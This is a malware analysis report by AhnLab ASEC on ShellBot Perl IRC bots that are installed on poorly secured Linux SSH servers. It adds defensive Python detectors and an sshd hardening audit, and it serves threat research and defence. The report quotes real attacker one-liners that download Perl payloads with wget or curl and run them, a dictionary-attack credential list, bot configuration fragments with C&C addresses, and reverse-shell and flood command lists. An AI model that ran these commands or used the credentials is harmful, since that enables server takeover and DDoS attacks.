AhnLab Security Emergency response Center (ASEC) has recently discovered the ShellBot 
malware being installed on poorly managed Linux SSH servers. ShellBot, also known as 
PerlBot, is a DDoS Bot malware developed in Perl that characteristically uses the IRC protocol to 
communicate with its C&C server. ShellBot is an old malware family that has been in steady use 
and is still being used today to launch attacks against Linux systems. 


1. Attack Campaigns Against Linux SSH Servers 


Desktops are the main work environment for ordinary users, whereas servers usually exist to 
provide specific services. Accordingly, malware attacks on desktop environments are typically 
carried out through web browsers or email attachments, and threat actors also distribute 
malware disguised as legitimate software to induce users to install it. Threat actors attacking 
server environments use a different method, since those distribution channels have limited 
reach there. Their prime targets are services that are poorly managed or that are vulnerable to 
exploitation because they have not been patched to the latest version. 


A typical example of a poorly managed service is one where simple account credentials are 
used, leaving the server vulnerable to dictionary attacks. Remote Desktop Protocol (RDP) and 
MS-SQL services are the prime attack vectors when Windows operating systems are targeted. 
On Linux servers, the Secure Shell (SSH) service is usually the target. In IoT environments 
where an old Linux server or an embedded Linux OS is installed, the Telnet service becomes 
the target of dictionary attacks. 


The ShellBot strains covered in this post are believed to have been installed after the threat 
actors obtained account credentials by running scanners and SSH brute-force malware against 
target systems. After scanning for systems with port 22 open, the threat actors identify those 
where the SSH service is active and use a list of commonly used SSH account credentials to run 
a dictionary attack. The following is a list of the actual account credentials used by the threat 
actors who install ShellBot. (A far greater number of credentials were used in the actual 
attacks; only the main examples are listed here.) 


User      Password 
deploy    password 
hadoop    hadoop 
oracle    oracle 
root      11111 
root      PasswOrd 
ttx       ttx2011 
ubnt      ubnt 

Table 1. A portion of the account credentials used by ShellBot operators 
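A credential list like Table 1 is most useful when turned into a detection on the server side. The following Python script is an added example written for this edit, not AhnLab's code: it parses sshd authentication lines in the usual syslog format (the sample below is constructed, using the Table 1 usernames and documentation IP ranges), flags a source that cycles through those dictionary usernames or exceeds a failure threshold, and flags any successful login that follows such a burst from the same source. The threshold of five failures and the log format are assumptions.

```python
import re
from collections import defaultdict

# Matches both "Failed password for root from ..." and
# "Failed password for invalid user hadoop from ..." sshd lines.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

# Usernames from Table 1 of the post; a source trying several of them in a
# row is a strong hint that the ShellBot operators' list is being replayed.
DICTIONARY_USERS = {"deploy", "hadoop", "oracle", "root", "ttx", "ubnt"}

# Constructed sample log (not from the original post).
SAMPLE_AUTH_LOG = """\
Mar 14 02:11:03 srv sshd[1201]: Failed password for root from 203.0.113.45 port 51234 ssh2
Mar 14 02:11:05 srv sshd[1201]: Failed password for root from 203.0.113.45 port 51234 ssh2
Mar 14 02:11:08 srv sshd[1203]: Failed password for invalid user hadoop from 203.0.113.45 port 51240 ssh2
Mar 14 02:11:10 srv sshd[1205]: Failed password for invalid user oracle from 203.0.113.45 port 51244 ssh2
Mar 14 02:11:13 srv sshd[1207]: Failed password for invalid user ubnt from 203.0.113.45 port 51250 ssh2
Mar 14 02:11:16 srv sshd[1209]: Failed password for invalid user deploy from 203.0.113.45 port 51255 ssh2
Mar 14 02:11:19 srv sshd[1211]: Accepted password for root from 203.0.113.45 port 51260 ssh2
Mar 14 02:30:01 srv sshd[1300]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2
Mar 14 02:31:11 srv sshd[1310]: Failed password for alice from 198.51.100.7 port 40030 ssh2
"""


def parse_events(log_text):
    """Yield (result, user, source_ip) for every sshd auth line that matches."""
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if m:
            yield m.group("result"), m.group("user"), m.group("ip")


def detect_dictionary_attacks(log_text, fail_threshold=5):
    """Return {"attackers": {ip: details}, "compromised": [(ip, user), ...]}."""
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    compromised = []
    for result, user, ip in parse_events(log_text):
        if result == "Failed":
            failures[ip] += 1
            users_tried[ip].add(user)
        elif result == "Accepted" and failures[ip] >= fail_threshold:
            # A success right after a burst of failures from the same source
            # usually means a guessed credential, not a returning admin.
            compromised.append((ip, user))
    attackers = {}
    for ip, count in failures.items():
        dictionary_hits = users_tried[ip] & DICTIONARY_USERS
        if count >= fail_threshold or len(dictionary_hits) >= 2:
            attackers[ip] = {
                "failures": count,
                "users": sorted(users_tried[ip]),
                "dictionary_users": sorted(dictionary_hits),
            }
    return {"attackers": attackers, "compromised": compromised}


if __name__ == "__main__":
    report = detect_dictionary_attacks(SAMPLE_AUTH_LOG)
    for ip, details in report["attackers"].items():
        print(f"dictionary attack from {ip}: {details}")
    for ip, user in report["compromised"]:
        print(f"likely compromised account {user!r} via {ip}")
```

Counting per source IP catches the single-scanner pattern described in this section; a distributed attack that spreads guesses over many sources would need the same counters keyed by target username instead, which is a one-line change to the loop.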


2. Internet Relay Chat (IRC) Protocol 


A characteristic of ShellBot, aside from being developed in Perl, is that it uses the IRC protocol 
to communicate with C&C servers. IRC is a real-time Internet chat protocol developed in 1988. 
Users log onto channels of an IRC server and chat in real time with the other users who have 
joined the same channel. 


An IRC Bot is bot malware that abuses this IRC service to communicate with C&C servers. The 
IRC Bot installed on the infected system connects, following the IRC protocol, to the IRC server 
channel designated by the threat actor. It then transmits stolen information to that channel, or, 
when the attacker enters a particular string in the channel, treats it as a command and performs 
the corresponding malicious behavior. 

Malware has long used IRC because the existing IRC protocol and IRC servers can be reused 
without developing a separate C&C server and protocol. Although IRC is seeing less use by 
malware targeting Windows operating systems, a large number of IRC Bots are still being 
distributed on Linux. 


3. ShellBot Analysis 


ShellBot has been used by various threat actors for a considerable amount of time, and a 
previous ASEC Blog post covered its use in attacks along with CoinMiners. 


Shc Linux Malware Installing CoinMiner 


Another characteristic of ShellBot is that its variants differ in form and features, since threat 
actors can customize them. The team has categorized ShellBot into three main types based on 
recent findings and summarized, for each type, the commands used during installation, its 
characteristics, and the DDoS attacks it supports. 


3.1. LiGhT’s Modded perlbot v2 
The following is a ShellBot named “LiGhT’s Modded perlbot v2”. 


################## 
# Version info    # 
################## 
if ($funcarg =~ /^version/) { 
    sendraw($IRC_cur_socket, "PRIVMSG $printl :|.:Version:.| LiGhT's Modded perlbot v2."); 
} 
######################## 
# End of Version info   # 
######################## 

Figure 1. ShellBot version information 

“LiGhT’s Modded perlbot v2” is being used by a variety of threat actors. The following 
commands are used in the ShellBot installation after the SSH server has been successfully 
logged into. 


Filename   Installation Command 
ak         wget -qO - x-x-x[.]online/ak|perl 
perl       nproc; nvidia-smi --list-gpus ;cd /tmp;wget -qO - http://34.225[.]57.146/futai/perl|perl;rm -rf perl 
mperl      cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl 
niko2      cd /tmp ; wget 193.233.202[.]219/niko1 ; perl niko1 ; rm -rf niko1 

Table 2. Commands used to install LiGhT's Modded perlbot v2 

Configuration data such as the C&C server and the name of the channel to join are included 
in the initial routine of ShellBot. A nickname with the format “IP-[5 random digits]” is used to 
join the IRC channels. 


#!/usr/bin/perl 
#!u @ddos 
#!u @commands 
#!u @irc 
############################ 
my $processo = '/usr/sbin/mysql'; 
my $linas_max='16'; 
my $sleep='5'; 
my $cmd=""; 
my $id=""; 
############################ 
my @adms=("A","A"); 
my @canais=("#nou"); 
my $chanpass = "@"; 
$num = int rand(99999); 
my $nick = "IP-" . $num . ""; 
my $ircname ='VICTIM'; 
chop (my $realname = 'VICTIM '); 
$servidor='164.90.240.68' unless $servidor; 
my $porta='6667'; 
############################ 

Figure 2. Configuration data of ShellBot 

Filename   C&C URL                  Channel Name 
ak         164.90.240[.]68:6667     #nou 
perl       164.132.224[.]207:80     #mailbomb 
mperl      206.189.139[.]152:6667   #Q 
niko1      176.123.2[.]3:6667       #X 

Table 3. C&C URL and channels of LiGhT's Modded perlbot v2 
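The configuration above and the IRC mechanics described in section 2 give a network defender three concrete things to look for in a client-to-server IRC stream: the nickname format "IP-" followed by five digits, the real name "VICTIM" sent in the USER command, and JOINs to the channels and servers listed in Table 3. The Python below is an added example for this edit (not the post's or AhnLab's code): a small parser for the IRC line format, followed by a session check that reports those indicators. The captured lines are constructed, not a real capture, and the Table 3 values are kept defanged in the source and refanged only for matching; Tables 6 and 9 later in the post can be added to the same sets.

```python
import re

# Indicators from Figure 2 and Table 3 of the post.
BOT_NICK_RE = re.compile(r"^IP-\d{5}$")
KNOWN_CHANNELS = {"#nou", "#mailbomb", "#Q", "#X"}
DEFANGED_CNC = ["164.90.240[.]68:6667", "164.132.224[.]207:80",
                "206.189.139[.]152:6667", "176.123.2[.]3:6667"]


def refang(hostport):
    """'1.2.3[.]4:6667' -> ('1.2.3.4', 6667)."""
    host, port = hostport.replace("[.]", ".").rsplit(":", 1)
    return host, int(port)


KNOWN_CNC = {refang(x) for x in DEFANGED_CNC}

# RFC 1459 line shape: [:prefix] COMMAND [params] [:trailing]
IRC_LINE_RE = re.compile(
    r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Za-z]+|\d{3})(?: (?P<params>.*))?$"
)


def parse_irc_line(line):
    """Split one IRC line into (prefix, COMMAND, params); a ' :trailing' param is kept whole."""
    m = IRC_LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    raw = m.group("params") or ""
    if raw.startswith(":"):
        params = [raw[1:]]
    elif " :" in raw:
        head, trailing = raw.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = raw.split()
    return m.group("prefix"), m.group("cmd").upper(), params


def assess_irc_session(dst_ip, dst_port, client_lines):
    """Return the ShellBot indicators found in one client->server IRC stream."""
    findings = []
    if (dst_ip, dst_port) in KNOWN_CNC:
        findings.append(f"destination {dst_ip}:{dst_port} is a known ShellBot C&C")
    for line in client_lines:
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _, cmd, params = parsed
        if cmd == "NICK" and params and BOT_NICK_RE.match(params[0]):
            findings.append(f"nick {params[0]} matches the IP-<5 digits> pattern")
        elif cmd == "USER" and len(params) >= 4 and params[3] == "VICTIM":
            findings.append("USER real name is 'VICTIM'")
        elif cmd == "JOIN" and params:
            for chan in params[0].split(","):
                if chan in KNOWN_CHANNELS:
                    findings.append(f"joined known ShellBot channel {chan}")
    return findings


# Constructed client lines resembling a bot login (not a real capture); the
# trailing "@" on JOIN is the $chanpass value from Figure 2.
CONSTRUCTED_BOT_SESSION = ["NICK IP-48213", "USER VICTIM 8 * :VICTIM",
                           "JOIN #nou @", "PRIVMSG #nou :hi"]
# A constructed ordinary user session for comparison.
CONSTRUCTED_USER_SESSION = ["NICK alice", "USER alice 0 * :Alice", "JOIN #linux"]

if __name__ == "__main__":
    for finding in assess_irc_session("164.90.240.68", 6667, CONSTRUCTED_BOT_SESSION):
        print("ALERT:", finding)
```

The nickname and real-name checks work even when the operator moves to a new server, which is why they are worth more than the IP list alone; the IP list is what ages fastest.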

The "LiGhT's Modded perlbot v2" version of ShellBot offers various features, which are broadly 
categorized in the table below. Commands that can be used directly for malicious purposes 
include DDoS commands such as TCP, UDP, and HTTP flooding. It also includes a variety of 
commands that give control over the infected system so that it can be used in other attacks, 
such as a reverse shell, log deletion, and a scanner. 

Command (Category)   Description 
flooding             IRC Flooding 
irc                  IRC control commands 
ddos                 DDoS commands (TCP, UDP, HTTP, SQL Flooding, etc.) 
news                 DDoS attack commands against security web pages 
hacking              Attack commands (MultiScan, Socks5, LogCleaner, Nmap, Reverse Shell, etc.) 
linuxhelp            Help 
extras               Additional features (assumed to be related to DDoS attacks) 
version              Version information output 

Table 4. Features supported by LiGhT's Modded perlbot v2 


3.2. DDoS PBot v2.0 


Aside from "LiGhT's Modded perlbot v2", "DDoS PBot v2.0" is also being used in a variety of 
attacks. A characteristic of "DDoS PBot v2.0" is that it displays basic information and the 
available commands in the comment block at the start of its code. 


########################################################################################### 
## DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team          ##  [ Help ]              ## 
## Stealth Multifunctional IrcBot writen in Perl               ##  !u @system            ## 
## Teste on every system with PERL instlled                    ##  !u @version           ## 
## This is a free program used on your own risk.               ##  !u @channel           ## 
## Created for educational purpose only.                       ##  !u @flood             ## 
## I'm not responsible for the illegal use of this program.    ##  !u @utils             ## 
########################################################################################### 
## [ Channel ]                   ## [ Flood ]                                  ## [ Utils ]                          ## 
## !u @join <#channel>           ## !u @udp1 <ip> <port> <time>                ## !u @cback <ip> <port>              ## 
## !u @part <#channel>           ## !u @udp2 <ip> <packet size> <time>         ## !u @downlod <url+path> <file>      ## 
## !u !rejoin <#channel>         ## !u @udp3 <ip> <port> <time>                ## !u @portscan <ip>                  ## 
## !u !op <channel> <nick>       ## !u @tcp <ip> <port> <packet size> <time>   ## !u @mail <subject> <sender>        ## 
## !u !deop <channel> <nick>     ## !u @http <site> <time>                     ##          <recipient> <message>     ## 
## !u !voice <channel> <nick>    ##                                            ## !u pwd;uname -a;id <for example>   ## 
## !u !devoice <channel> <nick>  ## !u @ctcpflood <nick>                       ## !u @port <ip> <port>               ## 
## !u !nick <newnick>            ## !u @msgflood <nick>                        ## !u @dns <ip/host>                  ## 
## !u !msg <nick>                ## !u @noticeflood <nick>                     ##                                    ## 
## !u !quit                      ##                                            ##                                    ## 
## !u !raw                       ##                                            ##                                    ## 
## !u @die                       ##                                            ##                                    ## 
########################################################################################### 

Figure 3. Initial routine of DDoS PBot v2.0 
The following are commands used to install "DDoS PBot v2.0". 

Filename   Installation Command 
bash       wget -qO - 80.94.92[.]241/bash|perl 
test.jpg   uname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS hxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c 
dred       uname -a;lspci | grep -i --color 'vga|3d|2d';curl -s -L hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred 

Table 5. Commands used to install DDoS PBot v2.0 
"DDoS PBot v2.0" randomly chooses a nickname from a selection of over 500, which include 
"abbore", "ably", and "abyss", before joining an IRC channel. 

my @rircname = ("abbore","ably","abyss","acrima","aerodream","afkdemon","ainthere","alberto","alexia","alexndra", 
"alias","alikki","alphaa","alterego","alvin","ambra","amed","andjela","andreas","anja", 
"anjing","anna","apeq","arntz","arskaz","as","asmodizz","assse","athanas","aulis", 
"aus","bar","bast","bedem","beeth","bella","birillo","bizio","blackhand","blacky", 
"blietta","blondenor","blueangel","bluebus","bluey","bobi","bopoh","borre","boy","bram", 
"brigitta","brio","brrrweg","brujah","caprcorn","carloto","catgirl","cathren","cemanmp","chainess", 
"chaingone","chck","chriz","cigs","cintat","clarissa","clbiz","clex","cobe","cocker", 
"coke","colin","conan","condoom","coop","coopers","corvonero","countzero","cracker","cread", 

Figure 4. List of DDoS PBot v2.0 nicknames (excerpt) 


Filename   C&C URL                  Channel Name 
bash       51.195.42[.]59:8080      #sex 
test.jpg   gsm.ftp[.]sh:1080        #test 
dred       192.3.141[.]163:6667     #bigfalus 

Table 6. C&C URL and channels of DDoS PBot v2.0 
IRC Bots in general receive their commands from the threat actor through the IRC channel, so 
the bot has to verify who is sending a command. Without a verification process, any user who 
joins the channel could control the bots at will. 

To do this, the IRC Bot performs an additional check: a user who has joined the channel must 
have an approved nickname and host address before a command is accepted. For example, in 
the case of the "bash" malware, the nickname must be "crond", "drugs", or "tab" as defined in 
the "admins" variable, and the host address must be "localhost" as defined in the "hostauth" 
variable. 
$server = '51.195.42.59' unless $server; 
my $port = '8080'; 
my $linas_max='8'; 
my $sleep='5'; 
my $homedir = "/tmp"; 
my $version = "DDoS Perl Bot v2.0"; 
my @admins = ("crond","drugs","tab"); 
my @hostauth = ("localhost"); 
my @channels = ("#sex"); 
my $pacotes = 1; 

Figure 5. Configuration data of DDoS PBot v2.0 
Like regular ShellBots, “DDoS PBot v2.0” also offers a variety of malicious commands 
including DDoS attack commands. 


Command (Category)   Description 
system               Infected system information output 
version              Version information output 
channel              IRC control commands 
flood                DDoS commands (TCP, UDP, HTTP, SQL Flooding, etc.) 
utils                Attack commands (Port Scan, Reverse Shell, file download, etc.) 

Table 7. Features supported by DDoS PBot v2.0 


3.3. PowerBots (C) GohacK 


The main characteristic of PowerBots is that it has a simpler form in comparison to the 
ShellBot types covered above. 
my @hostauth = ("w"); 
my @admchan=("#x"); 
my @server = ("49.212.234.206"); 
$servidor= $server[rand scalar @server] unless $servidor; 
my $xeqt = "!"; 
my $homedir = "/tmp"; 
my $shellaccess = 1; 
my $xstats = 1; 
my $pacotes = 1; 
my $linas_max = 5; 
my $sleep = 6; 
my $portime = 4; 
my @fakeps = ("/usr/sbin/sshd"); 
my @nickname = ("Linux"); 
my @xident = ("KAST"); 
my @xname = ("uname -a"); 
################ 
# Random Ports 
################ 
my @rports = ("3303"); 

Figure 6. Configuration data of PowerBots 
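The @fakeps value here, like $processo in Figure 2, is a name the bot writes into Perl's $0 so that process listings show /usr/sbin/sshd or /usr/sbin/mysql instead of perl. On Linux that rewrite changes /proc/<pid>/cmdline but not /proc/<pid>/exe, which still resolves to the interpreter binary, so the two can be compared. The Python below is an added example for this edit, not code from the post or from AhnLab: a pure check over (exe, argv) pairs, a constructed set of process entries covering the disguised and the legitimate cases, and a scan_proc() that applies the same check to a live /proc. The interpreter list and the assumption that argv[0] normally names the interpreter family are the example's own.

```python
import os
import re

# Interpreters whose argv[0] a script can rewrite (Perl does it by assigning to $0).
INTERP_RE = re.compile(r"^(perl|python|bash|dash|zsh|ksh|sh)[\d.]*$")
# Process names the analysed samples use as disguises ($processo in Figure 2, @fakeps in Figure 6).
KNOWN_DISGUISES = {"/usr/sbin/mysql", "/usr/sbin/sshd"}


def interpreter_family(name):
    """'python3.11' -> 'python', 'perl5.36' -> 'perl', 'sshd' -> None."""
    m = INTERP_RE.match(name)
    return m.group(1) if m else None


def is_disguised(exe_path, argv):
    """Return a reason when argv[0] claims a different program than the mapped executable."""
    if not exe_path or not argv:
        return None
    real = os.path.basename(exe_path.replace(" (deleted)", ""))
    claimed = os.path.basename(argv[0].lstrip("-"))  # login shells appear as "-bash"
    family = interpreter_family(real)
    if family and interpreter_family(claimed) != family:
        note = " (name used by the analysed ShellBot samples)" if argv[0] in KNOWN_DISGUISES else ""
        return f"argv[0] is {argv[0]!r} but the executable is {exe_path}{note}"
    return None


def scan_proc(proc="/proc"):
    """Apply is_disguised() to every process in a live /proc; returns [(pid, reason)].
    Reading another user's exe link needs root, so run as root for full coverage."""
    hits = []
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc, pid, "exe"))
            with open(os.path.join(proc, pid, "cmdline"), "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # kernel thread, already exited, or permission denied
        reason = is_disguised(exe, argv)
        if reason:
            hits.append((int(pid), reason))
    return hits


# Constructed entries: what /proc would show for the disguised bots and for
# ordinary processes that must not be flagged.
CONSTRUCTED_PROCESSES = [
    (4213, "/usr/bin/perl", ["/usr/sbin/mysql"]),                 # ShellBot with $processo
    (4377, "/usr/bin/perl", ["/usr/sbin/sshd"]),                  # PowerBots with @fakeps
    (1022, "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),           # the real sshd
    (2200, "/usr/bin/bash", ["-bash"]),                           # login shell
    (2390, "/usr/bin/python3.11", ["python3", "/opt/app/worker.py"]),
    (2500, "/usr/bin/perl", ["perl", "/usr/local/bin/report.pl"]),
]


def check_constructed():
    """Run the check over the constructed entries; returns the flagged (pid, reason) pairs."""
    results = []
    for pid, exe, argv in CONSTRUCTED_PROCESSES:
        reason = is_disguised(exe, argv)
        if reason:
            results.append((pid, reason))
    return results


if __name__ == "__main__":
    for pid, reason in check_constructed():
        print(f"[constructed] pid {pid}: {reason}")
    for pid, reason in scan_proc():
        print(f"[live] pid {pid}: {reason}")
```

The same exe-versus-cmdline comparison is what `ps` cannot do for you, because `ps` prints the rewritten cmdline; pairing it with the listening-port check on the @rports value above (a perl process bound to a port it has no business on) gives a second independent signal.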


Filename   Installation Command 
ff         uname -a ;wget -qO - hxxp://80.68.196[.]6/ff|perl &>>/dev/null 

Table 8. Command used to install PowerBots 
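All three installation tables (Tables 2, 5 and 8) share one shape: fetch with wget or curl, run the result with perl either straight through a pipe or from /tmp, then delete the file or clear the shell history. The Python below is an added example for this edit (not part of the post) that tokenises such a command line, as it would appear in shell history, an auditd execve record or EDR process telemetry, and reports exactly those patterns. Its inputs are the commands from the three tables, kept defanged as printed. The stage splitting relies on shlex's punctuation handling and is an approximation of shell parsing, which is the example's own assumption.

```python
import os
import re
import shlex

DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"perl", "sh", "bash", "python", "python3"}
# Loose URL matcher that also accepts the defanged forms used in the tables (hxxp://, [.]).
URL_RE = re.compile(r"^(?:hxxps?://|https?://)?[\w-]+(?:[.\[\]]+[\w-]+)+(?::\d+)?(?:/\S*)?$")


def split_stages(cmd):
    """Tokenise a command line and cut it at |, ;, &&, || and redirections.
    Returns [(argv, separator_after_stage)], an approximation of what the shell does."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    stages, current = [], []
    for tok in lex:
        if tok and tok[0] in "|;&<>()":
            if current:
                stages.append((current, tok))
            current = []
        else:
            current.append(tok)
    if current:
        stages.append((current, ""))
    return stages


def download_target(argv):
    """For a wget/curl argv return ('stdout', None) or ('file', name)."""
    tool, args = os.path.basename(argv[0]), argv[1:]
    url = next((a for a in args if URL_RE.match(a)), None)
    for i, a in enumerate(args):
        if tool == "curl" and a == "-o" and i + 1 < len(args):
            return "file", args[i + 1]
        if tool == "wget" and a.startswith("-") and "O-" in a:          # -O- or -qO-
            return "stdout", None
        if tool == "wget" and a.startswith("-") and a.endswith("O") and i + 1 < len(args):
            return ("stdout", None) if args[i + 1] == "-" else ("file", args[i + 1])
    if tool == "curl":
        return "stdout", None            # curl writes to stdout unless -o/-O is given
    if url:
        return "file", url.rsplit("/", 1)[-1]   # wget keeps the URL's last path component
    return "file", None


def analyze_command(cmd):
    """Report download-and-execute and anti-forensics patterns in one command line."""
    findings, downloaded = [], set()
    stages = split_stages(cmd)
    for i, (argv, sep) in enumerate(stages):
        head = os.path.basename(argv[0])
        nxt = stages[i + 1][0] if i + 1 < len(stages) else None
        touches_download = any(a in downloaded or os.path.basename(a) in downloaded for a in argv[1:])
        if head in DOWNLOADERS:
            kind, name = download_target(argv)
            if kind == "stdout" and sep == "|" and nxt and os.path.basename(nxt[0]) in INTERPRETERS:
                findings.append(f"{head} output piped straight into {nxt[0]} (fileless download-and-execute)")
            elif kind == "file" and name:
                downloaded.update({name, os.path.basename(name)})
        elif head in INTERPRETERS and touches_download:
            findings.append(f"downloaded file executed with {head}")
        elif head == "rm" and touches_download:
            findings.append("downloaded file deleted after use")
        elif head == "history" and "-c" in argv:
            findings.append("shell history cleared")
    return findings


# The installation commands from Tables 2, 5 and 8, defanged exactly as printed there.
TABLE_COMMANDS = {
    "ak": "wget -qO - x-x-x[.]online/ak|perl",
    "perl": "nproc; nvidia-smi --list-gpus ;cd /tmp;wget -qO - http://34.225[.]57.146/futai/perl|perl;rm -rf perl",
    "mperl": "cd /tmp ; wget 193.233.202[.]219/mperl ; perl mperl ; rm -rf mperl",
    "test.jpg": "uname -a;wget -q -O- hxxp://185.161.208[.]234/test.jpg|perl;curl -sS hxxp://185.161.208[.]234/test.jpg|perl;nproc;history -c",
    "dred": "uname -a;lspci | grep -i --color 'vga|3d|2d';curl -s -L hxxp://39.165.53[.]17:8088/iposzz/dred -o /tmp/dred;perl /tmp/dred",
    "ff": "uname -a ;wget -qO - hxxp://80.68.196[.]6/ff|perl &>>/dev/null",
}

if __name__ == "__main__":
    for name, cmd in TABLE_COMMANDS.items():
        print(f"{name}: {analyze_command(cmd)}")
```

The quoted `'vga|3d|2d'` in the dred command is why a naive split on `|` is not enough; shlex keeps the quoted argument whole, so the only pipe that counts is the one feeding curl's output into perl.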


Filename   C&C URL                  Channel Name 
ff         49.212.234[.]206:3303    #x 

Table 9. C&C URL and channel of PowerBots 


ShellBot types usually offer a variety of DDoS attack features, but since PowerBots mainly 
focuses on its reverse shell and file downloading capabilities, it is likely that the threat actor 
installed this ShellBot as a backdoor. 


Command   Description 
ps        Port scanning 
namp      NMAP port scanning 
rm        Delete files in a particular path 
version   Version information output 
down      File download 
udp       UDP Flooding attack 
back      Reverse Shell 

Table 10. Features supported by PowerBots 


4. Conclusion 


Recently, threat actors have been installing variants of the ShellBot malware on inadequately 
managed Linux SSH servers. These attacks have been occurring consistently for a long time, 
and numerous cases are still being confirmed. If ShellBot is installed, the Linux server can be 
used as a DDoS Bot in attacks against specific targets once it receives a command from the 
threat actor. Moreover, the threat actor could use the various backdoor features to install 
additional malware or launch different types of attacks from the compromised server. 

Because of this, administrators should use passwords that are difficult to guess and change 
them periodically to protect Linux servers from brute-force and dictionary attacks, and keep 
systems updated to the latest patch to prevent exploitation of vulnerabilities. Administrators 
should also use security programs such as firewalls for servers accessible from outside to 
restrict attacker access. Finally, V3 should be updated to the latest version so that malware 
infection can be prevented. 
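The password advice above is easiest to enforce in sshd_config itself, and the settings that matter against the dictionary attacks of section 1 are few. The Python audit below is an added example for this edit (not from the post or AhnLab): it reads the global section of an sshd_config, applying sshd's own rules that keywords are case-insensitive and that the first value of a keyword wins, fills in the OpenSSH defaults for anything not set, and reports the settings that leave password guessing possible. Both configs are constructed; the MaxAuthTries limit of 3 is the example's own choice.

```python
import re

# OpenSSH defaults for the keywords audited (PermitRootLogin has defaulted to
# prohibit-password since OpenSSH 7.0). sshd uses the FIRST value it sees for
# a keyword; later duplicates are silently ignored.
DEFAULTS = {
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "maxauthtries": "6",
    "pubkeyauthentication": "yes",
}


def parse_sshd_config(text):
    """Global section of an sshd_config as {lowercase keyword: first value}."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match"):
            break  # Match blocks are conditional; this audit covers the global section only
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) == 2:
            settings.setdefault(parts[0].lower(), parts[1].strip())
    return settings


def audit_sshd_config(text):
    """Return a list of findings; an empty list means the checked settings are hardened."""
    settings = parse_sshd_config(text)

    def value(key):
        return settings.get(key, DEFAULTS[key]).lower()

    findings = []
    if value("passwordauthentication") != "no":
        findings.append("PasswordAuthentication is not 'no': dictionary attacks on weak passwords remain possible")
    if value("permitrootlogin") not in ("no", "prohibit-password"):
        findings.append("PermitRootLogin allows password login for root, the account tried most often in Table 1")
    tries = value("maxauthtries")
    if not tries.isdigit() or int(tries) > 3:
        findings.append("MaxAuthTries above 3 lets a single connection test more guesses")
    if value("pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication disabled: key-based login cannot replace passwords")
    return findings


# Constructed weak configuration; the second PasswordAuthentication line is
# the classic mistake of "fixing" a setting below an earlier one.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no   # ignored: sshd keeps the first value
MaxAuthTries 10
"""

# Constructed hardened configuration; passwords stay allowed only from the
# internal network via a Match block, which the global audit deliberately skips.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
MaxAuthTries 3
AllowUsers alice ops
Match Address 10.0.0.0/8
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, "->", audit_sshd_config(cfg) or ["no findings"])
```

To audit the file a running daemon actually uses, feed the script the output of `sshd -T`, which prints the effective configuration with defaults and includes already resolved; the parser above handles that format unchanged.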


File Detection 
- Shellbot/Perl.Generic.S1100 (2020.02.12.00) 
- Shellbot/Perl.Generic.S1118 (2020.02.19.07) 

IOC 

MD5 
- bef1a9a49e201095da0bb26642f65a78 : ak 
- 3eef28005943fee77f48ac6ba633740d : mperl 
- 55e5bfa75d72e9b579e59c00eaeb6922 : niko1 
- 6d2c754760ccd6e078de931f472c0f72 : perl 
- 7ca3f23f54e8c027a7e8b517995ae433 : bash 
- 2cf90bf5b61d605c116ce4715551b7a3 : test.jpg 
- 7bc4c22b0f34ef28b69d83a23a6c88c5 : dred 
- 176ebfc431daa903ef83e69934759212 : ff 

Download URLs 
- x-x-x[.]online/ak 
- 193.233.202[.]219/mperl 
- 193.233.202[.]219/niko1 
- hxxp://34.225.57[.]146/futai/perl 
- 80.94.92[.]241/bash 
- hxxp://185.161.208[.]234/test.jpg 
- hxxp://39.165.53[.]17:8088/iposzz/dred 
- hxxp://80.68.196[.]6/ff 

C&C URLs 
- 164.90.240[.]68:6667 : ak 
- 206.189.139[.]152:6667 : mperl 
- 176.123.2[.]3:6667 : niko1 
- 164.132.224[.]207:80 : perl 
- 51.195.42[.]59:8080 : bash 
- gsm.ftp[.]sh:1080 : test.jpg 
- 192.3.141[.]163:6667 : dred 
- 49.212.234[.]206:3303 : ff 

Subscribe to AhnLab's next-generation threat intelligence platform 'AhnLab TIP' to 
check related IOC and detailed analysis information. 